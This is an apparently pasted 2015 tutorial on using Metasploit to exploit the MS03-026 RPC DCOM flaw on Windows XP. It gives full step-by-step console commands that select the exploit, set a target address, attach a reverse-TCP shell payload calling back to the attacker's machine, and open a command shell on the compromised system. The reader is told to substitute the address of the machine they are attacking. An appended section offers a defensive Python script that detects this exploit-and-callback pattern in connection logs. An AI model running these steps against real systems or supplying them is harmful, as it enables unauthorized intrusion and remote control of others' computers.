johnmahugu

tutorial - How to Exploit and Gain Remote Access to PCs

Jul 8th, 2015
tutorial - How to Exploit and Gain Remote Access to PCs Running Windows XP
In my first installment in this series on professional hacking tools, we downloaded and installed Metasploit, the exploitation framework. Now we will begin to explore the Metasploit Framework and carry out a tried and true hack.

Before we start hacking, let's familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with its various interfaces, options, utilities, and modules. Here we'll try to make it understandable so that we can execute our first exploit.
Terminology

The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.

* Exploit

An exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some of the more common exploit classes you've probably already heard of are SQL injection and buffer overflows.

* Payload

A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose, including the highly useful Meterpreter, or you can develop your own. The payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.

* Shellcode

Shellcode is a set of instructions used as a payload when the exploitation occurs. It is typically written in assembly language, but not always. It's called "shellcode" because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim's machine.

* Module

A module is a piece of software that can be used by the Metasploit Framework. Modules are interchangeable and give Metasploit its unique power. They may be exploit modules or auxiliary modules, among others.

* Listener

This is the component that waits for and handles the connection between the hacker's system and the target system. With a reverse payload such as the one used below, the target connects back to the listener on the hacker's machine.

* Show

The Metasploit Framework has hundreds of modules and other utilities, so you will not be able to remember them all. Fortunately, the show command lists all modules, options, targets, etc. available in your framework.

Now that we have the basics of Metasploit concepts and commands down, let's hack a system!
Step 1: Getting Started

First, open a terminal in Linux.

One of the most reliable hacks is against the ubiquitous Windows XP system via the RPC DCOM vulnerability. It's a buffer overflow that enables the attacker to execute any code of their choice on the owned box (note Microsoft's comment under "Impact of Vulnerability" in the bulletin). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.

Open the Metasploit console:

msfconsole

Be patient; it takes a while for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.
Step 2: Find the Exploit

Metasploit allows you to search for modules using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:

msf > search dcom
Step 3: Set the Exploit

Now let's tell Metasploit which exploit we want to use. Type use followed by the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom:

msf > use exploit/windows/dcerpc/ms03_026_dcom

Note that the prompt has changed and now reflects our chosen exploit.
Step 4: Set the Options

Now that we've chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list the options for executing this exploit:

msf > show options
Step 5: Set Remote Host

Metasploit will now ask us for the RHOST. This is the IP address of the remote host, the machine we're attacking. In our case, it's 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice that Metasploit tells us that this exploit uses (binds to) port 135, the RPC endpoint mapper port.

msf > set RHOST 10.0.0.3
Step 6: Show Payloads

Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:

msf > show payloads
Step 7: Set Payload

Now that we can see what payloads are available, we select generic/shell_reverse_tcp using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.

msf > set PAYLOAD generic/shell_reverse_tcp
Step 8: Set Local Host

Now that we've chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine (LHOST), which the reverse shell will connect back to. In this example, our attacking system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking from.

msf > set LHOST 10.0.0.6
Step 9: Exploit

Now we command Metasploit to exploit the system:

msf > exploit
Step 10: Open a Shell on the Hacked System

Type the command sessions -i 1 to open, in your Metasploit console, a command shell on the XP system:

sessions -i 1

To confirm that the command shell is on the Windows XP system, type dir to get a directory listing of the Windows XP system that you now own!

C:\>dir

Congratulations! You have just hacked your first system using Metasploit!

In my upcoming lessons, we will look at hacking Linux systems and introduce you to the powerful Meterpreter, Metasploit's proprietary payload.
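As an added, defender-side example that is not part of the original tutorial: the steps above leave a distinctive footprint in connection logs, an inbound connection to TCP 135 (RPC/DCOM) on the target, followed shortly by a new outbound connection from the target back to the same peer, which is the reverse shell callback of shell_reverse_tcp. The log line format, the IP addresses and the 60-second callback window below are constructed assumptions.

```python
"""Flag the RPC-DCOM exploit + reverse shell pattern in connection logs.

Rule: a host receives a new TCP connection on port 135 and, within a short
window, itself opens a new outbound TCP connection to that same peer.
"""
from datetime import datetime, timedelta

# Constructed sample log (assumed format): "<ISO time> <src_ip>:<port> -> <dst_ip>:<port>"
SAMPLE_LOG = """\
2015-07-08T10:00:01 10.0.0.6:51234 -> 10.0.0.3:135
2015-07-08T10:00:02 10.0.0.3:1044 -> 10.0.0.6:4444
2015-07-08T10:05:00 10.0.0.9:52000 -> 10.0.0.3:135
2015-07-08T10:07:30 10.0.0.3:1050 -> 10.0.0.10:445
"""

RPC_PORT = 135
CALLBACK_WINDOW = timedelta(seconds=60)  # assumed: callback follows the exploit quickly


def parse_line(line):
    """Split one constructed log line into (time, src_ip, src_port, dst_ip, dst_port)."""
    ts, src, _arrow, dst = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src_ip, int(src_port), dst_ip, int(dst_port)


def find_rpc_reverse_shell(log_text, window=CALLBACK_WINDOW):
    """Return (victim, peer, callback_port) for every inbound-135 connection that is
    followed, within `window`, by a new outbound connection from the victim to that peer."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    rpc_hits = {}  # victim ip -> [(time, peer ip)] of inbound connections to port 135
    alerts = []
    for ts, src, _sport, dst, dport in events:
        if dport == RPC_PORT:
            rpc_hits.setdefault(dst, []).append((ts, src))
        # Is this connection initiated by a host that just received RPC traffic,
        # and does it go back to the host that sent that traffic?
        for hit_ts, peer in rpc_hits.get(src, []):
            if dst == peer and timedelta(0) <= ts - hit_ts <= window:
                alerts.append((src, peer, dport))
    return alerts


if __name__ == "__main__":
    for victim, peer, port in find_rpc_reverse_shell(SAMPLE_LOG):
        print(f"ALERT: {victim} hit on tcp/135 by {peer}, then connected back to {peer}:{port}")
```

Legitimate RPC clients do not normally receive a fresh connection back from the server, so the second half of the rule is what separates this from ordinary DCOM traffic; the port-135 hit from 10.0.0.9 in the sample is not flagged on its own.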